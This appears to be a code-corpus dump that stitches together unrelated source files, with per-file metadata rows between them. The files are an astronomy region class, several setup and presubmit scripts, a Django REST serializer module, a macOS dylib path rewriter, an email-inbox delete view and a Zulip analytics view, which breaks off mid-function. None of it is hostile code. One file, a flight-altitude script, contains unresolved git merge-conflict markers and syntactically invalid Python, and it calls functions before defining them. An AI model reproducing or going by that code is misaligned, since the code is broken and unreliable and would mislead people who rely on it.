# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.coordinates import Angle
from astropy.units import Quantity
# Import the relevant PTS classes and modules
from .region import Region, PixelRegion, SkyRegion, PhysicalRegion
from ..basics.coordinate import PixelCoordinate, SkyCoordinate, PhysicalCoordinate
# -----------------------------------------------------------------
class PandaRegion(Region):
"""
This class ...
"""
def __init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs):
"""
The constructor ...
:param kwargs:
"""
# Check the angle
#if not isinstance(angle, Angle): raise ValueError("Angle must be a Astropy Angle object")
# Set the attributes
self.center = center
self.start_angle = start_angle
self.stop_angle = stop_angle
self.nangle = nangle
self.inner = inner
self.outer = outer
self.nradius = nradius
# Call the constructor of the base class
super(PandaRegion, self).__init__(**kwargs)
# -----------------------------------------------------------------
class PixelPandaRegion(PandaRegion, PixelRegion):
"""
This class ...
"""
def __init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs):
"""
This function ...
"""
# Check the start coordinate
#if not isinstance(start, PixelCoordinate): raise ValueError("Start must be pixel coordinate")
# Check the length
#if not isinstance(length, float): raise ValueError("Length must be float")
# Call the constructor of VectorRegion class
PandaRegion.__init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs)
# -----------------------------------------------------------------
class SkyPandaRegion(PandaRegion, SkyRegion):
"""
This class ...
"""
def __init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs):
"""
This function ...
:param start:
:param length:
:param angle:
:param kwargs:
"""
# Check the start coordinate
#if not isinstance(start, SkyCoordinate): raise ValueError("Start must be sky coordinate")
# Check the length
#if not isinstance(length, Quantity): raise ValueError("Length must be an angular quantity")
# Call the constructor of VectorRegion class
PandaRegion.__init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs)
# -----------------------------------------------------------------
class PhysicalPandaRegion(PandaRegion, PhysicalRegion):
"""
This class ...
"""
def __init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs):
"""
This function ...
:param start:
:param length:
:param angle:
:param kwargs:
"""
# Check the start coordinate
#if not isinstance(start, PhysicalCoordinate): raise ValueError("Start must be physical coordinate")
# Check the length
#if not isinstance(length, Quantity): raise ValueError("Length must be a physical quantity of length")
# Call the constructor of VectorRegion class
PandaRegion.__init__(self, center, start_angle, stop_angle, nangle, inner, outer, nradius, **kwargs)
# -----------------------------------------------------------------
| agpl-3.0 | -4,254,293,722,206,895,000 | 30.661538 | 110 | 0.548105 | false | 4.609183 | false | false | false |
jor-/matrix-decomposition | setup.py | 1 | 2841 | # Copyright (C) 2017-2018 Joscha Reimer [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""A setuptools based setup module.
https://packaging.python.org/en/latest/distributing.html
"""
import setuptools
import os.path
import versioneer_extended
# Get the long description from the README file
readme_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'README.rst')
with open(readme_file, mode='r', encoding='utf-8') as f:
long_description = f.read()
# Setup
setuptools.setup(
# general informations
name='matrix-decomposition',
description='This library allows to approximate Hermitian (dense and sparse) matrices by positive definite matrices. Furthermore it allows to decompose (factorize) positive definite matrices and solve associated systems of linear equations.',
long_description=long_description,
keywords='approximation Hermitian dense sparse matrix matrices positive definite decompose factorize decomposition factorization linear equation equations Cholesky',
url='https://github.com/jor-/matrix_decomposition',
author='Joscha Reimer',
author_email='[email protected]',
license='AGPL',
classifiers=[
# Development Status
'Development Status :: 5 - Production/Stable',
# Intended Audience, Topic
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities',
# Licence (should match "license" above)
'License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)',
# Supported Python versions
'Programming Language :: Python',
],
# version
version=versioneer_extended.get_version(),
cmdclass=versioneer_extended.get_cmdclass(),
# packages to install
packages=setuptools.find_packages(),
# dependencies
python_requires='>=3.7',
setup_requires=[
'setuptools>=0.8',
'pip>=1.4',
],
install_requires=[
'numpy>=1.15',
'scipy>=0.19',
],
extras_require={
'decompose_sparse': ['scikit-sparse>=0.4.2'],
},
)
| agpl-3.0 | -9,103,944,859,064,064,000 | 35.423077 | 246 | 0.699754 | false | 4.105491 | false | false | false |
bpsinc-native/src_third_party_libjingle_source_talk | PRESUBMIT.py | 2 | 5115 | # libjingle
# Copyright 2013 Google Inc.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# List of files that should not be committed to
DO_NOT_SUBMIT_FILES = [
"talk/media/webrtc/webrtcmediaengine.h",
"talk/media/webrtc/webrtcvideoengine.cc",
"talk/media/webrtc/webrtcvideoengine.h",
"talk/media/webrtc/webrtcvideoengine_unittest.cc"]
def _LicenseHeader(input_api):
"""Returns the license header regexp."""
# Accept any year number from start of project to the current year
current_year = int(input_api.time.strftime('%Y'))
allowed_years = (str(s) for s in reversed(xrange(2004, current_year + 1)))
years_re = '(' + '|'.join(allowed_years) + ')'
years_re = '%s(--%s)?' % (years_re, years_re)
license_header = (
r'.*? libjingle\n'
r'.*? Copyright %(year)s,? Google Inc\.\n'
r'.*?\n'
r'.*? Redistribution and use in source and binary forms, with or without'
r'\n'
r'.*? modification, are permitted provided that the following conditions '
r'are met:\n'
r'.*?\n'
r'.*? 1\. Redistributions of source code must retain the above copyright '
r'notice,\n'
r'.*? this list of conditions and the following disclaimer\.\n'
r'.*? 2\. Redistributions in binary form must reproduce the above '
r'copyright notice,\n'
r'.*? this list of conditions and the following disclaimer in the '
r'documentation\n'
r'.*? and/or other materials provided with the distribution\.\n'
r'.*? 3\. The name of the author may not be used to endorse or promote '
r'products\n'
r'.*? derived from this software without specific prior written '
r'permission\.\n'
r'.*?\n'
r'.*? THIS SOFTWARE IS PROVIDED BY THE AUTHOR \`\`AS IS\'\' AND ANY '
r'EXPRESS OR IMPLIED\n'
r'.*? WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES '
r'OF\n'
r'.*? MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE '
r'DISCLAIMED\. IN NO\n'
r'.*? EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, '
r'INCIDENTAL,\n'
r'.*? SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES \(INCLUDING, '
r'BUT NOT LIMITED TO,\n'
r'.*? PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR '
r'PROFITS;\n'
r'.*? OR BUSINESS INTERRUPTION\) HOWEVER CAUSED AND ON ANY THEORY OF '
r'LIABILITY,\n'
r'.*? WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT \(INCLUDING '
r'NEGLIGENCE OR\n'
r'.*? OTHERWISE\) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, '
r'EVEN IF\n'
r'.*? ADVISED OF THE POSSIBILITY OF SUCH DAMAGE\.\n'
) % {
'year': years_re,
}
return license_header
def _ProtectedFiles(input_api, output_api):
results = []
changed_files = []
for f in input_api.AffectedFiles():
changed_files.append(f.LocalPath())
bad_files = list(set(DO_NOT_SUBMIT_FILES) & set(changed_files))
if bad_files:
error_type = output_api.PresubmitError
results.append(error_type(
'The following affected files are only allowed to be updated when '
'importing libjingle',
bad_files))
return results
def _CommonChecks(input_api, output_api):
"""Checks common to both upload and commit."""
results = []
results.extend(input_api.canned_checks.CheckLicense(
input_api, output_api, _LicenseHeader(input_api)))
results.extend(_ProtectedFiles(input_api, output_api))
return results
def CheckChangeOnUpload(input_api, output_api):
results = []
results.extend(_CommonChecks(input_api, output_api))
return results
def CheckChangeOnCommit(input_api, output_api):
results = []
results.extend(_CommonChecks(input_api, output_api))
return results
| bsd-3-clause | -1,188,175,575,473,091,600 | 43.094828 | 80 | 0.682502 | false | 3.886778 | false | false | false |
EvangelouSotiris/flightradiationcalc | main.py | 1 | 5469 | import time
import requests
##############################################################
############## REQUESTS MANAGEMENT/ LINKS ####################
##############################################################
headers = {'User-Agent' : 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'}
<<<<<<< HEAD
flight = input('Enter the number of your flight: ')
firstpart = 'https://data-live.flightradar24.com/clickhandler/?version=1.5&flight='
r = requests.get(firstpart+flight, headers = headers)
=======
r = requests.get('https://data-live.flightradar24.com/clickhandler/?version=1.5&flight=dfa6132', headers = headers)
>>>>>>> refs/remotes/GiorgosNikitopoulos/master
jsoned_response = r.json()
global limit = len(jsoned_response['trail']) #no need to declare that in every function
##############################################################
################### INITIALISATIONS ##########################
##############################################################
each_derivative = [None] * (limit - 1)
risingSpeed = [None]*limit
enRouteAlts = [0]*12
enRouteTimestamps = [0]*12
enRouteCounter = 0 #position on enRoute matrixes
possibleLastTimestamp = 0 #last timestamp of enroute flight - start of descension
each_derivative = [None] * (limit - 1)
y = [None] * (limit) #initialisation y-altitude , x-time and dy/dx derivative
x = [None] * (limit)
first_time_derivative_flag = 0
first_time_derivative_zero_flag = 0
##############################################################
################# MAIN PROGRAM/ LOOPS ########################
##############################################################
## Getting requests - heights , timestamps , and alt changing speed measurement ## needed in functions ##
for i in range(0, limit):
global y[i] = jsoned_response['trail'][limit - 1 - i]['alt'] #values of altitudes
if y[i] == None:
print 'y is none in ' + str(i)
break
global x[i] = jsoned_response['trail'][limit - 1 - i]['ts'] #values of timestamps
if x[i] == None:
print 'x is none in ' + str(i)
break #Break statements if x or y values are none (can't be used)
if (i>0 && x[i-1]!= None && y[i-1]!= None):
global each_derivative[i - 1] = float(float((y[i] - y[i-1])) / float((x[i] - x[i-1]))) #each derivative = speed of changing altitudes
print x[i]
print y[i]
print each_derivative[i]
## Getting the response points where ascension ends and descension starts
ascensionFinishPoint = get_ascension_point(jsoned_response)
descensionStartingPoint = get_descension_point(jsoned_response)
##############################################################
################### FUNCTIONS ################################
##############################################################
## Functions for ascension and descension points
def get_ascension_point(jsoned_response):
counter_ascend = 0 #counter will help us decide the stage of flight
for i in range(0, limit):
if(each_derivative[i] < 10 and each_derivative[i] > 0): #If u>10 for 6+ successive points=>ascension
if(first_time_derivate_flag == 0):
first_time_derivate_flag = 1
possible_ascention_point = i
counter_ascend = counter_ascend + 1
print("counter_ascend = " , counter_ascend)
counter_descend = 0
else:
counter_ascend = 0
first_time_derivate_flag = 0
if(counter_ascend > 0 or first_time_derivative_zero_flag == 1):
first_time_derivative_zero_flag = 1
if(each_derivative[i] < 5 and each_derivative[i + 1] < 5 and each_derivative[i + 2] < 5):
print ("snap_ascend")
if(counter_ascend >= 15): #into ascension stage
ascend_point = i
print ("snap_ascend")
def get_descension_point(jsoned_response):
counter_descend = 0
for i in range(0, limit):
if(each_derivative[i] > -10 and each_derivative[i] < 0 and y[i] > 18000): #If u>10 for 6+ successive points=>ascension
if(first_time_derivate_flag == 0):
first_time_derivate_flag = 1
possible_ascention_point = i
counter_descend = counter_descend + 1
print("descend = " , counter_descend)
else:
counter_descend = 0
first_time_derivate_flag = 0
if(counter_descend > 0 or first_time_derivative_zero_flag == 1):
first_time_derivative_zero_flag = 1
if(each_derivative[i] > -5 and each_derivative[i + 1] > -5 and each_derivative[i + 2] > -5):
print ("snap_descend")
if(counter_descend >= 15): #into ascension stage
descend_point = i
print ("snap_descend")
##############################################################
############### OLD COMMITS/MAYBE USEFUL #####################
##############################################################
##ARTIFACT
######## EN ROUTE STAGE
# if (each_derivative>-5 and each_derivative<5): #En route stage of flight #######CHANGEABLE
# counter_ascend = 0
# counter_descend = 0
# # print ("snap_enroute")
# if (enRouteAlts[enRouteCounter] == 0): #1st time into en route stage
# enRouteAlts[enRouteCounter] = y[i]
# enRouteTimestamps[enRouteCounter] = x[i] #x1 time airplane got into that altitude
# if (abs(y[i]-enRouteAlts[enRouteCounter])>1000): #more than 1000 feet is considered another en route alt #######CHANGEABLE
# enRouteTimestamps[enRouteCounter] = x[i]-enRouteTimestamps[enRouteCounter] #x2-x1 time airplane stayed into former alt
# enRouteCounter = enRouteCounter + 1 #next altitude/timestamp matrix pos
# enRouteAlts[enRouteCounter] = y[i] #new alt
# enRouteTimestamps[enRouteCounter] = x[i] #x1 timestamp of new alt
| gpl-3.0 | -8,451,631,178,383,616,000 | 41.069231 | 135 | 0.588956 | false | 3.32462 | false | false | false |
KSG-IT/ksg-nett | api/serializers.py | 1 | 4959 | from django.conf import settings
from rest_framework import serializers
from rest_framework_simplejwt.serializers import TokenObtainSlidingSerializer
from api.exceptions import InsufficientFundsException, NoSociSessionError
from economy.models import SociProduct, ProductOrder, SociSession, SociBankAccount
class CustomTokenObtainSlidingSerializer(TokenObtainSlidingSerializer):
"""
Overridden so we can obtain a token for a user based only on the card uuid.
"""
username_field = "card_uuid"
def __init__(self, *args, **kwargs):
"""
Overridden from `TokenObtainSerializer` since this adds a required
field `password` to the serializer that we don't need.
"""
super().__init__(*args, **kwargs)
del self.fields['password']
def validate(self, attrs):
"""
Overridden from `TokenObtainSlidingSerializer` since
this expects a username and password to be supplied.
"""
data = {}
token = self.get_token(self.context['request'].user)
data['token'] = str(token)
return data
# ===============================
# ECONOMY
# ===============================
from sensors.consts import MEASUREMENT_TYPE_CHOICES
from sensors.models import SensorMeasurement
class SociProductSerializer(serializers.Serializer):
sku_number = serializers.CharField(read_only=True, label="Product SKU number")
name = serializers.CharField(read_only=True, label="Product name")
price = serializers.IntegerField(read_only=True, label="Product price in NOK")
description = serializers.CharField(read_only=True, allow_blank=True, allow_null=True, label="Product description",
help_text="Returns `null` if no description exists")
icon = serializers.CharField(read_only=True, label="Product icon descriptor")
class CheckBalanceSerializer(serializers.Serializer):
id = serializers.IntegerField(read_only=True, label="This soci bank account ID")
user = serializers.CharField(source='user.get_full_name', read_only=True, label="User´s full name")
balance = serializers.IntegerField(read_only=True, label="Balance in NOK",
help_text="Should not be displayed publicly")
class ChargeSociBankAccountDeserializer(serializers.Serializer):
sku = serializers.CharField(label="Product SKU number to charge for")
order_size = serializers.IntegerField(default=1, required=False, label="Order size for this product",
help_text="Defaults to 1 if not supplied")
@staticmethod
def validate_sku(value):
if not SociProduct.objects.filter(sku_number=value).exists():
raise serializers.ValidationError('SKU number is invalid.')
return value
@staticmethod
def validate_order_size(value):
if value <= 0:
raise serializers.ValidationError('Order size must be positive.')
return value
def validate(self, attrs):
if attrs['sku'] != settings.DIRECT_CHARGE_SKU:
attrs['amount'] = SociProduct.objects.get(sku_number=attrs['sku']).price
else:
attrs['amount'] = 1
self.context['total'] += attrs['amount'] * attrs['order_size']
if self.context['total'] > self.context['soci_bank_account'].balance:
raise InsufficientFundsException()
if SociSession.get_active_session() is None:
raise NoSociSessionError()
return attrs
def create(self, validated_data):
product_order = ProductOrder.objects.create(
product=SociProduct.objects.get(sku_number=validated_data.pop('sku')), **validated_data
)
return product_order
class PurchaseSerializer(serializers.Serializer):
amount_charged = serializers.IntegerField(read_only=True, source='total_amount',
label="Amount that was charged from user´s Soci account")
amount_remaining = serializers.IntegerField(read_only=True, source='source.balance',
label="Remaining balance in user´s Soci account",
help_text="Should not be displayed publicly")
products_purchased = serializers.ListField(read_only=True, child=serializers.CharField(),
help_text="The products that were purchased")
class SensorMeasurementSerializer(serializers.Serializer):
type = serializers.ChoiceField(
choices=MEASUREMENT_TYPE_CHOICES,
label="The type of measurement.",
)
value = serializers.FloatField(
label="The value of the measurement",
)
created_at = serializers.DateTimeField(
label="The time of the measurement",
)
def create(self, validated_data):
return SensorMeasurement.objects.create(**validated_data)
| gpl-3.0 | 6,613,007,558,135,177,000 | 36.545455 | 119 | 0.650525 | false | 4.460846 | false | false | false |
fordcars/SDL3D | tools/Frameworkify/frameworkify.py | 1 | 3860 | #!/usr/bin/env python -S
# -*- coding: utf-8 -*-
r"""
frameworkify
~~~~~~~~~~~~
A small command line tool that can rewrite the paths to dynamic
loaded libraries in .dylib files so that they reference other
paths. By default it will rewrite the path so that it points to
the bundle's Frameworks folder. This can be paired with a CMake
post build action to make proper bundles without having to
recompile a bunch of dylibs to reference the framework.
Usage::
$ frameworkify.py MyApplication.app/Contents/MacOS/MyApplication \
> /path/to/mylib.dylib
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
from optparse import OptionParser
def find_bundle(executable):
executable = os.path.abspath(executable)
if not os.path.isfile(executable):
raise RuntimeError('Executable does not exist')
folder, exe_name = os.path.split(executable)
content_path, folder = os.path.split(folder)
if folder != 'MacOS':
raise RuntimeError('Executable not located inside a bundle')
return content_path
def find_baked_dylibs(executable):
from subprocess import Popen, PIPE
c = Popen(['otool', '-L', executable], stdout=PIPE)
lines = c.communicate()[0].splitlines()
return [x.strip().split(' (')[0] for x in lines[1:]]
def find_matching_dylib(dylibs, basename):
lbasename = basename.lower()
for dylib in dylibs:
if os.path.basename(dylib).lower() == lbasename:
return dylib
def rewrite_path(executable, old, new):
from subprocess import Popen
Popen(['install_name_tool', '-change', old, new, executable]).wait()
def copy_to_framework(bundle_path, filename, target_name):
from shutil import copy2
framework_path = os.path.join(bundle_path, 'Frameworks')
if not os.path.isdir(framework_path):
os.mkdir(framework_path)
copy2(filename, os.path.join(framework_path, target_name))
def perform_rewrite_operation(rewrites, executable, bundle_path, copy=True):
for old_path, new_path, dylib_path in rewrites:
rewrite_path(executable, old_path, new_path)
if copy:
copy_to_framework(bundle_path, dylib_path,
os.path.basename(new_path))
def frameworkify(executable, dylibs, nocopy, path):
bundle = find_bundle(executable)
baked_dylibs = find_baked_dylibs(executable)
def _make_new_path(dylib_name):
if path:
return os.path.join(path, dylib_name)
return '@executable_path/../Frameworks/' + dylib_name
rewrites = []
for dylib in dylibs:
dylib_name = os.path.basename(dylib)
dylib_path_match = find_matching_dylib(baked_dylibs, dylib_name)
if dylib_path_match is None:
raise Exception('dylib "%s" is not referenced by "%s"' % (
dylib_name,
executable
))
rewrites.append((dylib_path_match, _make_new_path(dylib_name), dylib))
perform_rewrite_operation(rewrites, executable, bundle, not nocopy)
def main():
parser = OptionParser()
parser.add_option('-p', '--path', dest='path', metavar='PATH',
help='alternative path to dylib')
parser.add_option('-C', '--nocopy', dest='nocopy', action='store_true',
help='don\'t copy dylib to framework folder')
opts, args = parser.parse_args()
if len(args) < 2:
parser.error('Not enough arguments: executable and a list of dylibs')
if opts.path and not opts.nocopy:
parser.error('Path combined with copy operation is not supported')
try:
frameworkify(args[0], args[1:], opts.nocopy, opts.path)
except Exception, e:
parser.error(str(e))
sys.exit(1)
if __name__ == '__main__':
main() | gpl-3.0 | -5,696,709,541,733,503,000 | 31.720339 | 78 | 0.644041 | false | 3.780607 | false | false | false |
acbilson/forbidden-island | tests/test_print.py | 1 | 1905 | import sys
sys.path.append('../src')
from tiles import *
from tile import *
class Test(object):
def __init__(self):
self.board = ""
def gen_board(self, tiles):
segments = []
rows = [[0,1],
[2,3,4,5],
[6,7,8,9,10,11],
[12,13,14,15,16,17],
[18,19,20,21],
[22,23]]
spaces = [' ',
' ',
'',
'',
' ',
' ']
names = [t.name for t in tiles]
players = [t.player for t in tiles]
statuses = [t.status for t in tiles]
allSegs = []
for i in range(0, len(rows)):
nameSegments = self._gen_segments(rows[i], spaces[i], ('/', '\\'), names)
playerSegments = self._gen_segments(rows[i], spaces[i], ('|', '|'), players)
statusSegments = self._gen_segments(rows[i], spaces[i], ('\\', '/'), statuses, newLine=True)
allSegs.append(''.join(nameSegments))
allSegs.append(''.join(playerSegments))
allSegs.append(''.join(statusSegments))
return ''.join(allSegs)
def _gen_segments(self, row, space, dividers, tileSegments, newLine=None):
TILE_SPACE = ' '
segments = []
segments.append(space)
last = row[len(row)-1]
rowSegments = tileSegments[row[0]:last+1]
for i,rs in enumerate(rowSegments):
segments.append(dividers[0] + rs.value + dividers[1])
if len(rowSegments) != i:
segments.append(TILE_SPACE)
segments.append(space + '\n')
if newLine != None:
segments.append('\n')
return segments
if __name__ == '__main__':
tiles = Tiles()
t = Test()
board = t.gen_board(tiles.tiles)
print(board)
| gpl-3.0 | 8,462,663,968,441,839,000 | 23.74026 | 104 | 0.467192 | false | 3.764822 | false | false | false |
Inboxen/website | views/inbox/delete.py | 1 | 2017 | ##
# Copyright (C) 2013 Jessica Tallon & Matt Molyneaux
#
# This file is part of Inboxen.
#
# Inboxen is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Inboxen is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Inboxen. If not, see <http://www.gnu.org/licenses/>.
##
from django.views import generic
from django.utils.translation import ugettext as _
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse_lazy
from django.contrib import messages
from inboxen import models
from queue.delete.tasks import delete_inbox
from website import forms
from website.views import base
__all__ = ["InboxDeletionView"]
class InboxDeletionView(base.CommonContextMixin, base.LoginRequiredMixin, generic.DeleteView):
model = models.Inbox
success_url = reverse_lazy('user-home')
headline = _("Delete Inbox")
template_name = "inbox/delete.html"
def get_object(self, *args, **kwargs):
return self.request.user.inbox_set.get(
inbox=self.kwargs["inbox"],
domain__domain=self.kwargs["domain"]
)
def delete(self, request, *args, **kawrgs):
self.object = self.get_object()
success_url = self.get_success_url()
self.object.flags.deleted = True
self.object.save()
delete_inbox.delay(self.object.id, request.user.id)
messages.success(request, _("{0}@{1} has been deleted.".format(self.object.inbox, self.object.domain.domain)))
return HttpResponseRedirect(success_url)
| agpl-3.0 | -7,981,159,622,210,445,000 | 36.351852 | 118 | 0.706495 | false | 3.80566 | false | false | false |
juan-cb/django-cookie-law | setup.py | 1 | 1609 | #!/usr/bin/env python
import os
from setuptools import setup, find_packages
from itertools import chain
from glob import glob
import cookielaw
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: JavaScript',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Session',
]
package_data_globs = (
'cookielaw/templates/cookielaw/*.html',
'cookielaw/static/cookielaw/*/*',
'cookielaw/locale/*/*/*'
)
package_data = []
for f in chain(*map(glob, package_data_globs)):
package_data.append(f.split('/', 1)[1])
setup(
author='Piotr Kilczuk',
author_email='[email protected]',
name='django-cookie-law',
version='.'.join(str(v) for v in cookielaw.VERSION),
description='Helps your Django project comply with EU cookie law regulations',
long_description=open(os.path.join(os.path.dirname(__file__), 'README.rst')).read(),
url='https://github.com/TyMaszWeb/django-cookie-law',
license='BSD License',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=[
'Django>=1.2',
'django-classy-tags>=0.3.0',
],
tests_require=[
'selenium==3.0.1',
],
packages=find_packages(),
package_data={'cookielaw': package_data},
include_package_data=False,
zip_safe=False,
test_suite='runtests.main',
)
| bsd-2-clause | -8,123,308,249,982,098,000 | 27.22807 | 88 | 0.649472 | false | 3.408898 | false | false | false |
sonali0901/zulip | analytics/views.py | 1 | 37020 | from __future__ import absolute_import, division
from django.conf import settings
from django.core import urlresolvers
from django.db import connection
from django.db.models import Sum
from django.db.models.query import QuerySet
from django.http import HttpResponseNotFound, HttpRequest, HttpResponse
from django.template import RequestContext, loader
from django.utils import timezone
from django.utils.translation import ugettext as _
from jinja2 import Markup as mark_safe
from analytics.lib.counts import CountStat, process_count_stat, COUNT_STATS
from analytics.lib.time_utils import time_range
from analytics.models import BaseCount, InstallationCount, RealmCount, \
UserCount, StreamCount, last_successful_fill
from zerver.decorator import has_request_variables, REQ, zulip_internal, \
zulip_login_required, to_non_negative_int, to_utc_datetime
from zerver.lib.request import JsonableError
from zerver.lib.response import json_success
from zerver.lib.timestamp import ceiling_to_hour, ceiling_to_day, timestamp_to_datetime
from zerver.models import Realm, UserProfile, UserActivity, \
UserActivityInterval, Client
from zproject.jinja2 import render_to_response
from collections import defaultdict
from datetime import datetime, timedelta
import itertools
import json
import logging
import pytz
import re
import time
from six.moves import filter, map, range, zip
from typing import Any, Dict, List, Tuple, Optional, Callable, Type, \
Union, Text
@zulip_login_required
def stats(request):
# type: (HttpRequest) -> HttpResponse
return render_to_response('analytics/stats.html',
context=dict(realm_name = request.user.realm.name))
@has_request_variables
def get_chart_data(request, user_profile, chart_name=REQ(),
min_length=REQ(converter=to_non_negative_int, default=None),
start=REQ(converter=to_utc_datetime, default=None),
end=REQ(converter=to_utc_datetime, default=None)):
# type: (HttpRequest, UserProfile, Text, Optional[int], Optional[datetime], Optional[datetime]) -> HttpResponse
if chart_name == 'number_of_humans':
stat = COUNT_STATS['active_users:is_bot:day']
tables = [RealmCount]
subgroups = ['false', 'true']
labels = ['human', 'bot']
labels_sort_function = None
include_empty_subgroups = [True]
elif chart_name == 'messages_sent_over_time':
stat = COUNT_STATS['messages_sent:is_bot:hour']
tables = [RealmCount, UserCount]
subgroups = ['false', 'true']
labels = ['human', 'bot']
labels_sort_function = None
include_empty_subgroups = [True, False]
elif chart_name == 'messages_sent_by_message_type':
stat = COUNT_STATS['messages_sent:message_type:day']
tables = [RealmCount, UserCount]
subgroups = ['public_stream', 'private_stream', 'private_message']
labels = ['Public Streams', 'Private Streams', 'PMs & Group PMs']
labels_sort_function = lambda data: sort_by_totals(data['realm'])
include_empty_subgroups = [True, True]
elif chart_name == 'messages_sent_by_client':
stat = COUNT_STATS['messages_sent:client:day']
tables = [RealmCount, UserCount]
subgroups = [str(x) for x in Client.objects.values_list('id', flat=True).order_by('id')]
# these are further re-written by client_label_map
labels = list(Client.objects.values_list('name', flat=True).order_by('id'))
labels_sort_function = sort_client_labels
include_empty_subgroups = [False, False]
else:
raise JsonableError(_("Unknown chart name: %s") % (chart_name,))
# Most likely someone using our API endpoint. The /stats page does not
# pass a start or end in its requests.
if start is not None and end is not None and start > end:
raise JsonableError(_("Start time is later than end time. Start: %(start)s, End: %(end)s") %
{'start': start, 'end': end})
realm = user_profile.realm
if start is None:
start = realm.date_created
if end is None:
end = last_successful_fill(stat.property)
if end is None or start > end:
logging.warning("User from realm %s attempted to access /stats, but the computed "
"start time: %s (creation time of realm) is later than the computed "
"end time: %s (last successful analytics update). Is the "
"analytics cron job running?" % (realm.string_id, start, end))
raise JsonableError(_("No analytics data available. Please contact your server administrator."))
end_times = time_range(start, end, stat.frequency, min_length)
data = {'end_times': end_times, 'frequency': stat.frequency, 'interval': stat.interval}
for table, include_empty_subgroups_ in zip(tables, include_empty_subgroups):
if table == RealmCount:
data['realm'] = get_time_series_by_subgroup(
stat, RealmCount, realm.id, end_times, subgroups, labels, include_empty_subgroups_)
if table == UserCount:
data['user'] = get_time_series_by_subgroup(
stat, UserCount, user_profile.id, end_times, subgroups, labels, include_empty_subgroups_)
if labels_sort_function is not None:
data['display_order'] = labels_sort_function(data)
else:
data['display_order'] = None
return json_success(data=data)
def sort_by_totals(value_arrays):
# type: (Dict[str, List[int]]) -> List[str]
totals = []
for label, values in value_arrays.items():
totals.append((label, sum(values)))
totals.sort(key=lambda label_total: label_total[1], reverse=True)
return [label for label, total in totals]
# For any given user, we want to show a fixed set of clients in the chart,
# regardless of the time aggregation or whether we're looking at realm or
# user data. This fixed set ideally includes the clients most important in
# understanding the realm's traffic and the user's traffic. This function
# tries to rank the clients so that taking the first N elements of the
# sorted list has a reasonable chance of doing so.
def sort_client_labels(data):
# type: (Dict[str, Dict[str, List[int]]]) -> List[str]
realm_order = sort_by_totals(data['realm'])
user_order = sort_by_totals(data['user'])
label_sort_values = {} # type: Dict[str, float]
for i, label in enumerate(realm_order):
label_sort_values[label] = i
for i, label in enumerate(user_order):
label_sort_values[label] = min(i-.1, label_sort_values.get(label, i))
return [label for label, sort_value in sorted(label_sort_values.items(),
